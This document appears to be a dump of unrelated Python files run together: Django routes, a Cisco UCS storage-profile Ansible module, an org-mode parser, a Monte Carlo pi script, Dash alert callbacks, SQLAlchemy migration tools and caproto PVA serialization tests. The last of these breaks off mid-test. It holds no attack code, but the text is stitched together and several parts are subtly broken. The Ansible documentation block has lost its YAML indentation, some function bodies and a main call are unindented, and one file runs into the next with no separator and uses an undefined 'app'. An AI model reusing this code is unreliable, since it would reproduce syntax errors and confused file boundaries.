    path('get_summary', views.get_summary, name='get_summary'),
    path('save_session', views.save_session, name='save_session'),
    path('remove_session/<int:index>', views.remove_session, name='remove_session'),
    path('rename_session/<str:new_name>', views.rename_session, name='rename_session'),
    path('download_session', views.download_session, name='download_session'),
    path('get_segments_links', views.get_segments_links, name='get_segments_links'),
    path('reverse_segment/<int:index>', views.reverse_segment, name='reverse_segment'),
    path('change_segments_order', views.change_segments_order, name='change_segments_order'),
    path('divide_segment/<int:index>/<int:div_index>', views.divide_segment, name='divide_segment'),
    # path('hello/<int:var>', views.hello, name='hello'),
]
# DEBUG will only be available during development; in other cases a more
# powerful server, like nginx, would be used to serve media files.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL,
                          document_root=settings.MEDIA_ROOT)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: ucs_storage_profile
short_description: Configures storage profiles on Cisco UCS Manager
description:
- Configures storage profiles on Cisco UCS Manager.
- Examples can be used with the L(UCS Platform Emulator,https://communities.cisco.com/ucspe).
extends_documentation_fragment: ucs
options:
state:
description:
- If C(present), will verify that the storage profile is present and will create if needed.
- If C(absent), will verify that the storage profile is absent and will delete if needed.
choices: [ absent, present ]
default: present
name:
description:
- The name of the storage profile.
- This name can be between 1 and 16 alphanumeric characters.
- "You cannot use spaces or any special characters other than - (hyphen), \"_\" (underscore), : (colon), and . (period)."
- You cannot change this name after profile is created.
required: yes
description:
description:
- The user-defined description of the storage profile.
- Enter up to 256 characters.
- "You can use any characters or spaces except the following:"
- "` (accent mark), \ (backslash), ^ (carat), \" (double quote), = (equal sign), > (greater than), < (less than), or ' (single quote)."
aliases: [ descr ]
local_luns:
description:
- List of Local LUNs used by the storage profile.
suboptions:
name:
description:
- The name of the local LUN.
required: yes
size:
description:
- Size of this LUN in GB.
- The size can range from 1 to 10240 GB.
default: '1'
auto_deploy:
description:
- Whether the local LUN should be automatically deployed or not.
choices: [ auto-deploy, no-auto-deploy ]
default: auto-deploy
expand_to_avail:
description:
- Specifies that this LUN can be expanded to use the entire available disk group.
- For each service profile, only one LUN can use this option.
- Expand To Available option is not supported for already deployed LUN.
type: bool
default: 'no'
fractional_size:
description:
- Fractional size of this LUN in MB.
default: '0'
disk_policy_name:
description:
- The disk group configuration policy to be applied to this local LUN.
state:
description:
- If C(present), will verify local LUN is present on profile.
If C(absent), will verify local LUN is absent on profile.
choices: [ absent, present ]
default: present
org_dn:
description:
- The distinguished name (dn) of the organization where the resource is assigned.
default: org-root
requirements:
- ucsmsdk
author:
- Sindhu Sudhir (@sisudhir)
- David Soper (@dsoper2)
- CiscoUcs (@CiscoUcs)
version_added: '2.7'
'''
EXAMPLES = r'''
- name: Configure Storage Profile
ucs_storage_profile:
hostname: 172.16.143.150
username: admin
password: password
name: DEE-StgProf
local_luns:
- name: Boot-LUN
size: '60'
disk_policy_name: DEE-DG
- name: Data-LUN
size: '200'
disk_policy_name: DEE-DG
- name: Remove Storage Profile
ucs_storage_profile:
hostname: 172.16.143.150
username: admin
password: password
name: DEE-StgProf
state: absent
- name: Remove Local LUN from Storage Profile
ucs_storage_profile:
hostname: 172.16.143.150
username: admin
password: password
name: DEE-StgProf
local_luns:
- name: Data-LUN
state: absent
'''
RETURN = r'''
#
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.remote_management.ucs import UCSModule, ucs_argument_spec
def main():
    """Ansible module entry point.

    Ensures the named UCS storage profile (and, optionally, its local
    LUNs) is present or absent on the target UCS Manager.  Honors check
    mode; reports via module.exit_json/fail_json.
    """
    # Sub-spec for each element of the local_luns list option.
    local_lun = dict(
        name=dict(type='str', required=True),
        state=dict(type='str', default='present', choices=['present', 'absent']),
        size=dict(type='str', default='1'),
        auto_deploy=dict(type='str', default='auto-deploy', choices=['auto-deploy', 'no-auto-deploy']),
        expand_to_avail=dict(type='str', default='no', choices=['no', 'yes']),
        fractional_size=dict(type='str', default='0'),
        disk_policy_name=dict(type='str', default=''),
    )
    argument_spec = ucs_argument_spec
    argument_spec.update(
        org_dn=dict(type='str', default='org-root'),
        name=dict(type='str', required=True),
        description=dict(type='str', aliases=['descr'], default=''),
        local_luns=dict(type='list', elements='dict', options=local_lun),
        state=dict(type='str', default='present', choices=['present', 'absent']),
    )
    module = AnsibleModule(
        argument_spec,
        supports_check_mode=True,
    )
    ucs = UCSModule(module)
    err = False
    # UCSModule creation above verifies ucsmsdk is present and exits on failure. Additional imports are done below.
    from ucsmsdk.mometa.lstorage.LstorageProfile import LstorageProfile
    from ucsmsdk.mometa.lstorage.LstorageDasScsiLun import LstorageDasScsiLun
    ucs.result['changed'] = False
    try:
        mo_exists = False
        props_match = False
        # dn is <org_dn>/profile-<name>
        dn = module.params['org_dn'] + '/profile-' + module.params['name']
        mo = ucs.login_handle.query_dn(dn)
        if mo:
            mo_exists = True
        if module.params['state'] == 'absent':
            # mo must exist but all properties do not have to match
            if mo_exists:
                if not module.check_mode:
                    ucs.login_handle.remove_mo(mo)
                    ucs.login_handle.commit()
                ucs.result['changed'] = True
        else:
            if mo_exists:
                # check top-level mo props
                kwargs = dict(descr=module.params['description'])
                if mo.check_prop_match(**kwargs):
                    # top-level props match, check next level mo/props
                    if not module.params.get('local_luns'):
                        props_match = True
                    else:
                        # check local lun props; any mismatch (or a LUN that
                        # should be absent but exists) forces a re-apply below
                        for lun in module.params['local_luns']:
                            child_dn = dn + '/das-scsi-lun-' + lun['name']
                            mo_1 = ucs.login_handle.query_dn(child_dn)
                            if lun['state'] == 'absent':
                                if mo_1:
                                    props_match = False
                                    break
                            else:
                                if mo_1:
                                    kwargs = dict(size=str(lun['size']))
                                    kwargs['auto_deploy'] = lun['auto_deploy']
                                    kwargs['expand_to_avail'] = lun['expand_to_avail']
                                    kwargs['fractional_size'] = str(lun['fractional_size'])
                                    kwargs['local_disk_policy_name'] = lun['disk_policy_name']
                                    if mo_1.check_prop_match(**kwargs):
                                        props_match = True
                                    else:
                                        props_match = False
                                        break
            if not props_match:
                if not module.check_mode:
                    # create if mo does not already exist
                    mo = LstorageProfile(
                        parent_mo_or_dn=module.params['org_dn'],
                        name=module.params['name'],
                        descr=module.params['description'],
                    )
                    if module.params.get('local_luns'):
                        for lun in module.params['local_luns']:
                            if lun['state'] == 'absent':
                                child_dn = dn + '/das-scsi-lun-' + lun['name']
                                mo_1 = ucs.login_handle.query_dn(child_dn)
                                ucs.login_handle.remove_mo(mo_1)
                            else:
                                mo_1 = LstorageDasScsiLun(
                                    parent_mo_or_dn=mo,
                                    name=lun['name'],
                                    size=str(lun['size']),
                                    auto_deploy=lun['auto_deploy'],
                                    expand_to_avail=lun['expand_to_avail'],
                                    fractional_size=str(lun['fractional_size']),
                                    local_disk_policy_name=lun['disk_policy_name'],
                                )
                    # second arg True: modify the MO if it is already present
                    ucs.login_handle.add_mo(mo, True)
                    ucs.login_handle.commit()
                ucs.result['changed'] = True
    except Exception as e:
        err = True
        ucs.result['msg'] = "setup error: %s " % str(e)
    if err:
        module.fail_json(**ucs.result)
    module.exit_json(**ucs.result)
if __name__ == '__main__':
main()
|
# Copyright Contributors to the OpenCue Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Custom garbage collector class.
Disables automatic garbage collection and instead collect manually every INTERVAL milliseconds.
This is done to ensure that garbage collection only happens in the GUI thread, as otherwise Qt
can crash."""
import gc
from PySide2 import QtCore
class GarbageCollector(QtCore.QObject):
    """Custom garbage collector class.

    Disables automatic garbage collection and instead collect manually every INTERVAL milliseconds.
    This is done to ensure that garbage collection only happens in the GUI thread, as otherwise Qt
    can crash."""

    # Collection period in milliseconds (QTimer uses ms).
    INTERVAL = 5000

    def __init__(self, parent, debug=False):
        """Disable automatic GC and start the periodic collection timer.

        :param parent: Qt parent object; also ties the timer's lifetime to it.
        :param debug: if True, print uncollectable objects on every run.
        """
        QtCore.QObject.__init__(self, parent)
        self.debug = debug
        self.timer = QtCore.QTimer(self)
        self.timer.timeout.connect(self.check)  # pylint: disable=no-member
        # Saved thresholds (not re-applied here; kept for reference).
        self.threshold = gc.get_threshold()
        gc.disable()
        self.timer.start(self.INTERVAL)

    def check(self):
        """Runs the garbage collector.

        This method is run every INTERVAL milliseconds."""
        gc.collect()
        if self.debug:
            # gc.garbage holds objects the collector found uncollectable.
            for obj in gc.garbage:
                print(obj, repr(obj), type(obj))
|
import pytest
from aio_forms import ERROR_REQUIRED, LengthValidator, StringField
from tests.fields.utils import FIELD_KEY, do_common
pytestmark = pytest.mark.asyncio
async def test_common():
    """Run the shared field checks (see do_common) against StringField.

    NOTE(review): the defaults are padded with whitespace — presumably so
    the common checks also exercise stripping; confirm against do_common.
    """
    await do_common(
        field_cls=StringField,
        default=' Test default ',
        default_new=' Test default new ',
        has_validators=True,
        has_filters=True,
        has_required=True,
    )
def test():
    """StringField.schema() resolves a callable label to its value."""
    label_text = 'Test Label'
    field = StringField(key=FIELD_KEY, label=lambda: label_text)
    expected_schema = dict(
        key=FIELD_KEY,
        type='string',
        input_type='text',
        value=None,
        label=label_text,
    )
    assert field.schema() == expected_schema
async def test_length_validator():
    """Validate required/optional handling and LengthValidator bounds.

    NOTE(review): despite the name, the first half covers plain
    required/optional behaviour, not LengthValidator.
    """
    # Required field with no value: validation fails, error recorded.
    field_1 = StringField(key=FIELD_KEY, required=True)
    assert field_1.error is None
    assert await field_1.validate(None) is False
    assert field_1.error == ERROR_REQUIRED
    # Optional field with no value: validation passes, no error.
    field_2 = StringField(key=FIELD_KEY, required=False)
    assert field_2.error is None
    assert await field_2.validate(None) is True
    assert field_2.error is None
    # Length validator alone does not make the field required.
    field_3 = StringField(key=FIELD_KEY, validators=(LengthValidator(min=5, max=10),))
    assert await field_3.validate(None) is True  # ok, because not required
    field_4 = StringField(
        key=FIELD_KEY,
        validators=(LengthValidator(min=5, max=10),),
        required=True,
    )
    assert await field_4.validate(None) is False  # required, but empty
    field_4.set_value('1' * 5)
    assert await field_4.validate(None) is True  # ok, 5-symbols text
    field_4.set_value('1' * 15)
    assert await field_4.validate(None) is False  # error, too big
    field_4.set_value('1' * 7)
    assert await field_4.validate(None) is True  # ok, 7-symbols text
def test_filters():
    """Filters run in declaration order on the stripped default value."""
    initial = 'Some text. Another text. '
    to_lower = lambda text: text.lower()
    a_to_b = lambda text: text.replace('a', 'b')
    field = StringField(
        key=FIELD_KEY,
        default=initial,
        filters=(to_lower, a_to_b),
    )
    assert field.value == initial.strip().lower().replace('a', 'b')
|
from sklearn import metrics
import numpy as np
def get_fpr_tpr_ths(y_param, scores_param):
    """
    Returns fpr, tpr, thresholds.
    Positive label is +.
    """
    labels = np.array(y_param)
    score_values = np.array(scores_param)
    # metrics.roc_curve already returns the (fpr, tpr, thresholds) triple.
    return metrics.roc_curve(labels, score_values, pos_label='+')
|
# Copyright (c) 2010 Charles Cave
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Program written by Charles Cave (charlesweb@optusnet.com.au)
# February - March 2009
# Version 2 - June 2009
# Added support for all tags, TODO priority and checking existence of a tag
# More information at
# http://members.optusnet.com.au/~charles57/GTD
"""
The Orgnode module consists of the Orgnode class for representing a
headline and associated text from an org-mode file, and routines for
constructing data structures of these classes.
"""
import re, sys
import datetime
def makelist(filename):
    """
    Read an org-mode file and return a list of Orgnode objects
    created from this file.

    Exits the program (status 1) if the file cannot be opened.
    """
    ctr = 0
    try:
        f = open(filename, 'r')
    except IOError:
        # print() form works on both Python 2 and 3
        print("Unable to open file [%s] " % filename)
        print("Program terminating.")
        sys.exit(1)
    todos = dict()  # populated from #+SEQ_TODO line
    todos['TODO'] = ''  # default values
    todos['DONE'] = ''  # default values
    # FIX: initialize level to a string; the final Orgnode() call below
    # does len(level), which crashed on files containing no headline.
    level = ""
    heading = ""
    bodytext = ""
    tag1 = ""  # The first tag enclosed in ::
    alltags = []  # list of all tags in headline
    sched_date = ''
    deadline_date = ''
    nodelist = []
    propdict = dict()
    for line in f:
        ctr += 1
        hdng = re.search(r'^(\*+)\s(.*?)\s*$', line)
        if hdng:
            if heading:  # flush the previously accumulated heading
                thisNode = Orgnode(level, heading, bodytext, tag1, alltags)
                if sched_date:
                    thisNode.setScheduled(sched_date)
                    sched_date = ""
                if deadline_date:
                    thisNode.setDeadline(deadline_date)
                    deadline_date = ''
                thisNode.setProperties(propdict)
                nodelist.append(thisNode)
                propdict = dict()
            level = hdng.group(1)
            heading = hdng.group(2)
            bodytext = ""
            tag1 = ""
            alltags = []  # list of all tags in headline
            # split trailing :tag1:tag2: block off the heading, if any
            tagsrch = re.search(r'(.*?)\s*:(.*?):(.*?)$', heading)
            if tagsrch:
                heading = tagsrch.group(1)
                tag1 = tagsrch.group(2)
                alltags.append(tag1)
                tag2 = tagsrch.group(3)
                if tag2:
                    for t in tag2.split(':'):
                        if t != '':
                            alltags.append(t)
        else:  # we are processing a non-heading line
            if line[:10] == '#+SEQ_TODO':
                kwlist = re.findall(r'([A-Z]+)\(', line)
                for kw in kwlist:
                    todos[kw] = ""
            if line[:1] != '#':
                bodytext = bodytext + line
            if re.search(':PROPERTIES:', line):
                continue
            if re.search(':END:', line):
                continue
            # property drawer entry  :NAME: value
            prop_srch = re.search(r'^\s*:(.*?):\s*(.*?)\s*$', line)
            if prop_srch:
                propdict[prop_srch.group(1)] = prop_srch.group(2)
                continue
            sd_re = re.search(r'SCHEDULED:\s+<([0-9]+)\-([0-9]+)\-([0-9]+)', line)
            if sd_re:
                sched_date = datetime.date(int(sd_re.group(1)),
                                           int(sd_re.group(2)),
                                           int(sd_re.group(3)))
            dd_re = re.search(r'DEADLINE:\s*<(\d+)\-(\d+)\-(\d+)', line)
            if dd_re:
                deadline_date = datetime.date(int(dd_re.group(1)),
                                              int(dd_re.group(2)),
                                              int(dd_re.group(3)))
    f.close()  # FIX: the handle was previously never closed
    # write out last node
    thisNode = Orgnode(level, heading, bodytext, tag1, alltags)
    thisNode.setProperties(propdict)
    if sched_date:
        thisNode.setScheduled(sched_date)
    if deadline_date:
        thisNode.setDeadline(deadline_date)
    nodelist.append(thisNode)
    # using the list of TODO keywords found in the file
    # process the headings searching for TODO keywords
    for n in nodelist:
        h = n.Heading()
        todoSrch = re.search(r'([A-Z]+)\s(.*?)$', h)
        if todoSrch:
            if todoSrch.group(1) in todos:  # FIX: has_key removed (py3)
                n.setHeading(todoSrch.group(2))
                n.setTodo(todoSrch.group(1))
        prtysrch = re.search(r'^\[\#(A|B|C)\] (.*?)$', n.Heading())
        if prtysrch:
            n.setPriority(prtysrch.group(1))
            n.setHeading(prtysrch.group(2))
    return nodelist
######################
class Orgnode(object):
    """
    Orgnode class represents a headline, tags and text associated
    with the headline.
    """

    def __init__(self, level, headline, body, tag, alltags):
        """
        Create an Orgnode object given the parameters of level (as the
        raw asterisks), headline text (including the TODO tag), and
        first tag. The makelist routine postprocesses the list to
        identify TODO tags and updates headline and todo fields.
        """
        self.level = len(level)
        self.headline = headline
        self.body = body
        self.tag = tag            # The first tag in the list
        self.tags = dict()        # All tags in the headline
        self.todo = ""
        self.prty = ""            # empty or A, B or C
        self.scheduled = ""       # Scheduled date
        self.deadline = ""        # Deadline date
        self.properties = dict()
        for t in alltags:
            self.tags[t] = ''
        # Look for priority in headline and transfer to prty field

    def Heading(self):
        """
        Return the Heading text of the node without the TODO tag
        """
        return self.headline

    def setHeading(self, newhdng):
        """
        Change the heading to the supplied string
        """
        self.headline = newhdng

    def Body(self):
        """
        Returns all lines of text of the body of this node except the
        Property Drawer
        """
        return self.body

    def Level(self):
        """
        Returns an integer corresponding to the level of the node.
        Top level (one asterisk) has a level of 1.
        """
        return self.level

    def Priority(self):
        """
        Returns the priority of this headline: 'A', 'B', 'C' or empty
        string if priority has not been set.
        """
        return self.prty

    def setPriority(self, newprty):
        """
        Change the value of the priority of this headline.
        Valid values are '', 'A', 'B', 'C'
        """
        self.prty = newprty

    def Tag(self):
        """
        Returns the value of the first tag.
        For example, :HOME:COMPUTER: would return HOME
        """
        return self.tag

    def Tags(self):
        """
        Returns a list of all tags
        For example, :HOME:COMPUTER: would return ['HOME', 'COMPUTER']
        """
        # FIX: wrap in list() so Python 3 callers get a real list, as
        # documented, rather than a dict_keys view.
        return list(self.tags.keys())

    def hasTag(self, srch):
        """
        Returns True if the supplied tag is present in this headline
        For example, hasTag('COMPUTER') on headling containing
        :HOME:COMPUTER: would return True.
        """
        # FIX: dict.has_key does not exist on Python 3; use `in`.
        return srch in self.tags

    def setTag(self, newtag):
        """
        Change the value of the first tag to the supplied string
        """
        self.tag = newtag

    def setTags(self, taglist):
        """
        Store all the tags found in the headline. The first tag will
        also be stored as if the setTag method was called.
        """
        for t in taglist:
            self.tags[t] = ''

    def Todo(self):
        """
        Return the value of the TODO tag
        """
        return self.todo

    def setTodo(self, value):
        """
        Set the value of the TODO tag to the supplied string
        """
        self.todo = value

    def setProperties(self, dictval):
        """
        Sets all properties using the supplied dictionary of
        name/value pairs
        """
        self.properties = dictval

    def Property(self, keyval):
        """
        Returns the value of the requested property or null if the
        property does not exist.
        """
        return self.properties.get(keyval, "")

    def setScheduled(self, dateval):
        """
        Set the scheduled date using the supplied date object
        """
        self.scheduled = dateval

    def Scheduled(self):
        """
        Return the scheduled date object or null if nonexistent
        """
        return self.scheduled

    def setDeadline(self, dateval):
        """
        Set the deadline (due) date using the supplied date object
        """
        self.deadline = dateval

    def Deadline(self):
        """
        Return the deadline date object or null if nonexistent
        """
        return self.deadline

    def __repr__(self):
        """
        Print the level, heading text and tag of a node and the body
        text as used to construct the node.
        """
        # This method is not completed yet.
        n = ''
        for i in range(0, self.level):
            n = n + '*'
        n = n + ' ' + self.todo + ' '
        if self.prty:
            n = n + '[#' + self.prty + '] '
        n = n + self.headline
        n = "%-60s " % n  # hack - tags will start in column 62
        closecolon = ''
        for t in self.tags.keys():
            n = n + ':' + t
            closecolon = ':'
        n = n + closecolon
        # Need to output Scheduled Date, Deadline Date, property tags The
        # following will output the text used to construct the object
        n = n + "\n" + self.body
        return n
|
import multiprocessing  # python's version of openMP
import math
from random import uniform

num_of_procs = 1  # can be used for testing number of processes
num_of_points = int(1000000 / num_of_procs)  # total sample count split evenly per process
points_in_circle = 0
x_points = []
y_points = []


def distance(x, y):
    """Return the Euclidean distance of point (x, y) from the origin."""
    return math.sqrt((x - 0)**2 + (y - 0)**2)


def random_point():
    """Sample num_of_points uniform points in [-1, 1]^2 and count circle hits.

    Returns the number of points falling inside the unit circle, and also
    accumulates it into the module-global points_in_circle for backward
    compatibility with the original script.
    """
    global points_in_circle
    hits = 0
    for _ in range(num_of_points):
        x_points.append(uniform(-1, 1))  # generates random float numbers
        y_points.append(uniform(-1, 1))
        if distance(x_points[-1], y_points[-1]) < 1:
            hits += 1
    points_in_circle += hits
    return hits


def calculate_pi():
    """Print the Monte Carlo estimate: 4 * hits / total samples."""
    print("pi =", (4 * points_in_circle) / (num_of_points * num_of_procs))


if __name__ == "__main__":
    # BUG FIX: the original used Process(target=random_point()) -- calling
    # the worker in the parent and handing each Process a target of None,
    # so the children did no work.  Globals are also not shared between
    # processes, so each worker must RETURN its hit count and the parent
    # must sum them; a Pool handles both.
    with multiprocessing.Pool(processes=num_of_procs) as pool:
        async_results = [pool.apply_async(random_point)
                         for _ in range(num_of_procs)]
        points_in_circle = sum(res.get() for res in async_results)
    calculate_pi()
|
# import commands
import subprocess
import os
# Demo: three ways to run an external binary and capture its output.
main = "./testmain"
if os.path.exists(main):
    # 1) subprocess.getstatusoutput -- Python 3 replacement for the old
    #    Python 2 commands.getstatusoutput shown in the comment below.
    # rc, out = commands.getstatusoutput(main)
    (rc, out) = subprocess.getstatusoutput(main)
    print ('rc = %d, \nout = %s' % (rc, out))
    print ('*'*10)
    # 2) os.popen: read the program's stdout line by line.
    f = os.popen(main)
    data = f.readlines()
    f.close()
    print (data)
    print ('*'*10)
    # 3) os.system: run it, output goes straight to our stdout.
    os.system(main)
import dash_bootstrap_components as dbc
from dash import Input, Output, State, html
# Demo layout: two trigger buttons, a separator, and two dismissable
# alerts -- one using the default fade transition, one with fade disabled.
# The buttons' n_clicks feed the callbacks defined below this layout.
alert = html.Div(
    [
        dbc.Button(
            "Toggle alert with fade",
            id="alert-toggle-fade",
            className="me-1",
            n_clicks=0,
        ),
        dbc.Button(
            "Toggle alert without fade", id="alert-toggle-no-fade", n_clicks=0
        ),
        html.Hr(),
        dbc.Alert(
            "Hello! I am an alert",
            id="alert-fade",
            dismissable=True,
            is_open=True,
        ),
        dbc.Alert(
            "Hello! I am an alert that doesn't fade in or out",
            id="alert-no-fade",
            dismissable=True,
            fade=False,
            is_open=True,
        ),
    ]
)
@app.callback(
    Output("alert-fade", "is_open"),
    [Input("alert-toggle-fade", "n_clicks")],
    [State("alert-fade", "is_open")],
)
def toggle_alert(n, is_open):
    """Flip the fading alert's visibility on every button click."""
    # n is 0 before the first click; keep the current state until then.
    return (not is_open) if n else is_open
@app.callback(
    Output("alert-no-fade", "is_open"),
    [Input("alert-toggle-no-fade", "n_clicks")],
    [State("alert-no-fade", "is_open")],
)
def toggle_alert_no_fade(n, is_open):
    """Flip the non-fading alert's visibility on every button click."""
    # n is 0 before the first click; keep the current state until then.
    return (not is_open) if n else is_open
|
#!venv/bin/python
# -*- encoding: utf-8 -*-
import sys
import os.path
sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('..'))
from migrate.versioning import api
from config import SQLALCHEMY_DATABASE_URI
from config import SQLALCHEMY_MIGRATE_REPO
from app import db, models
def create():
    """Create all tables and put the database under version control.

    If the migration repository does not exist yet, create it first;
    otherwise stamp the database with the repository's current version.
    """
    from app import db  # NOTE(review): shadows the module-level import; kept as-is
    db.create_all()
    if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):
        api.create(SQLALCHEMY_MIGRATE_REPO, 'database repository')
        api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    else:
        api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO,
                            api.version(SQLALCHEMY_MIGRATE_REPO))
def migrate():
    """Generate the next migration script and upgrade the database.

    Compares the previous model (reconstructed from the repository) with
    the current db.metadata, writes the auto-generated script into the
    versions directory, then applies it.
    """
    from types import ModuleType  # FIX: replaces the deprecated `imp` module
    from app import db
    v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    migration = SQLALCHEMY_MIGRATE_REPO + \
        ('/versions/%03d_migration.py' % (v + 1))
    # Materialize the old model into a throwaway module namespace.
    tmp_module = ModuleType('old_model')
    old_model = api.create_model(SQLALCHEMY_DATABASE_URI,
                                 SQLALCHEMY_MIGRATE_REPO)
    exec(old_model, tmp_module.__dict__)
    script = api.make_update_script_for_model(SQLALCHEMY_DATABASE_URI,
                                              SQLALCHEMY_MIGRATE_REPO,
                                              tmp_module.meta, db.metadata)
    # FIX: write via a context manager so the file handle is closed
    # deterministically (it previously leaked).
    with open(migration, "wt") as script_file:
        script_file.write(script)
    api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    print('New migration saved as {}'.format(migration))
    print('Current database version: {}'.format(str(v)))
def upgrade():
    """Upgrade the database to the repository's latest revision."""
    api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    version = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    print('Current database version: {}'.format(str(version)))
def downgrade():
    """Roll the database back by exactly one revision."""
    current = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    api.downgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, current - 1)
    current = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    print('Current database version: {}'.format(str(current)))
def clean():
    """Delete every User row, committing once after all deletions."""
    for u in models.User.query.all():
        db.session.delete(u)
    db.session.commit()
if __name__ == '__main__':
    import argparse
    desc = """A set of database tools for building web apps using python
    and SQLAlchemy.
    """
    # Exactly one action may be selected per invocation.
    parser = argparse.ArgumentParser(description=desc)
    options = parser.add_mutually_exclusive_group()
    options.add_argument('--create', action="store_true",
                         help="Create a new db")
    options.add_argument('--migrate', action="store_true",
                         help="Migrate db with new changes")
    options.add_argument('--upgrade', action="store_true",
                         help="Upgrade db to newer version")
    options.add_argument('--downgrade', action="store_true",
                         help="Downgrade db to older version")
    options.add_argument('--clean', action="store_true",
                         help="Delete all data in db")
    args = parser.parse_args()
    # Dispatch to the selected action; with no flag, point at --help.
    if args.create:
        create()
    elif args.migrate:
        migrate()
    elif args.upgrade:
        upgrade()
    elif args.downgrade:
        downgrade()
    elif args.clean:
        clean()
    else:
        print("$ python db_tools.py --help")
|
import binascii
import logging
import textwrap
import typing
from array import array
from typing import List, Union
import pytest
from numpy.testing import assert_array_almost_equal
pytest.importorskip('caproto.pva')
from caproto import pva
from caproto.pva._fields import FieldArrayType, FieldType
logger = logging.getLogger(__name__)
def _fromhex(s):
s = ''.join(s.strip().split('\n'))
s = s.replace(' ', '')
return binascii.unhexlify(s)
def round_trip(obj, endian, **kwargs):
    """Serialize *obj*, deserialize the bytes, and return (object, bytes).

    Asserts that deserialization consumed the entire serialized payload.
    """
    wire = b''.join(obj.serialize(endian=endian, **kwargs))
    result, _, nbytes = type(obj).deserialize(wire, endian=endian, **kwargs)
    assert nbytes == len(wire)
    return result, wire
def round_trip_value(cls, value, endian, **kwargs):
    """Serialize *value* via *cls*, deserialize it back, return (value, bytes).

    Asserts that deserialization consumed the entire serialized payload.
    """
    wire = b''.join(cls.serialize(value, endian=endian, **kwargs))
    result, _, nbytes = cls.deserialize(wire, endian=endian, **kwargs)
    assert nbytes == len(wire)
    return result, wire
@pytest.mark.parametrize(
    'endian', [pytest.param(pva.LITTLE_ENDIAN, id='LE'),
               pytest.param(pva.BIG_ENDIAN, id='BE')]
)
@pytest.mark.parametrize(
    'value, expected_length',
    # Encoded lengths per the table: 1 byte for the smallest values,
    # +4 bytes once that overflows, +8 more beyond the 32-bit range.
    [(None, 1),
     (0, 1),
     (255, 1 + 4),
     (256, 1 + 4),
     (int(2 ** 31 - 2), 1 + 4),
     (int(2 ** 32), 1 + 4 + 8),
     (int(2 ** 63), 1 + 4 + 8),
     (pva.MAX_INT32, 1 + 4 + 8)
     ]
)
def test_size_roundtrip(endian, value, expected_length):
    """A pva Size value round-trips and encodes to the expected length."""
    roundtrip_value, serialized = round_trip_value(pva.Size, value, endian=endian)
    assert len(serialized) == expected_length
    assert value == roundtrip_value
    print(serialized, value)
@pytest.mark.parametrize(
    'endian', [pytest.param(pva.LITTLE_ENDIAN, id='LE'),
               pytest.param(pva.BIG_ENDIAN, id='BE')]
)
def test_status_utilities(endian):
    """Status helper constructors set the expected fields, and an error
    Status survives a serialization round trip in both endians."""
    assert pva.Status.create_success().status == pva.StatusType.OK
    err = pva.Status.create_error(message='test', call_tree='test2')
    assert err.status == pva.StatusType.ERROR
    assert err.message == 'test'
    assert err.call_tree == 'test2'
    rt_err, _ = round_trip(err, endian=endian)
    assert err.message == rt_err.message
    assert err.call_tree == rt_err.call_tree
    assert err.status == rt_err.status
def test_status_example():
    """Deserialize three consecutive Status values from a captured
    big-endian byte stream (OK, then WARNING, then ERROR)."""
    status_example = _fromhex(
        "FF010A4C6F77206D656D6F727900022A4661696C656420746F20"
        "6765742C2064756520746F20756E657870656374656420657863"
        "657074696F6EDB6A6176612E6C616E672E52756E74696D654578"
        "63657074696F6E0A096174206F72672E65706963732E63612E63"
        "6C69656E742E6578616D706C652E53657269616C697A6174696F"
        "6E4578616D706C65732E7374617475734578616D706C65732853"
        "657269616C697A6174696F6E4578616D706C65732E6A6176613A"
        "313138290A096174206F72672E65706963732E63612E636C6965"
        "6E742E6578616D706C652E53657269616C697A6174696F6E4578"
        "616D706C65732E6D61696E2853657269616C697A6174696F6E45"
        "78616D706C65732E6A6176613A313236290A"
    )
    buf = bytearray(status_example)
    # OK encodes to a single byte.
    print('\n- status 1')
